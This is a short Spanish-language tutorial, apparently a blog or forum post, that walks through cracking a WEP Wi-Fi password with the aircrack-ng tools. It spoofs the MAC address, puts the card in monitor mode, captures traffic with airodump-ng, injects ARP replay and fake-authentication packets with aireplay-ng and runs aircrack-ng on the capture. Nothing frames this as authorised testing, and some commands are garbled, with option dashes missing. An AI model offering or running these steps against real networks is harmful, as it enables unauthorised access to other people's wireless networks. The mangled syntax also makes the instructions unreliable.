Tenemos que desactivar la tarjeta de red con el comando airmon-ng stop ath0, donde ath0 es el nombre de la placa, en este

caso es altheros.

- Hay que cambiar la MAC, para ello escribimos: macchanger -m 11:22:33:44:55:66 wifi0.

- Arrancamos nuestra placa de red en modo monitor y escribimos: airmon-ng start wifi0.

- Escribimos: iwconfig para comprobar que todo lo que hicimos esta realizado correctamente.

- Revisamos si hay redes en nuestra rea de cobertura, para ello escribimos: airodump-ng wifi0.

- Ahora lo importante de la imagen anterior es la MAC de la red (BSSID), el canal por donde se transmite la red Wi-Fi (CH), y el nombre de la red (ESSID). Para detener la bsqueda de redes presionamos CTRL + C y escribimos los siguiente: airodump-ng channel X write XXX ath0. La X en channel se reemplaza por 5 en este caso y la XXXes el nombre con que guardamos la informacin, puede colocarse cualquier nombre. - Abrimos otra ventana de Shell y escribimos: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0.

- Nuevamente abrimos otra ventana de shell y escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0.

- Bueno finalmente deberemos ser pacientes y esperar que los ARP sean altos (50.000), para as poder obtener la contrasea. Cuando tengamos suficiente datos para poder descifrar la password (lleva tiempo y experiencia), cerramos todos los Shell y escribimos: Aircrack-ng pass-01.cap, con esto descifraremos la contrasea encriptada.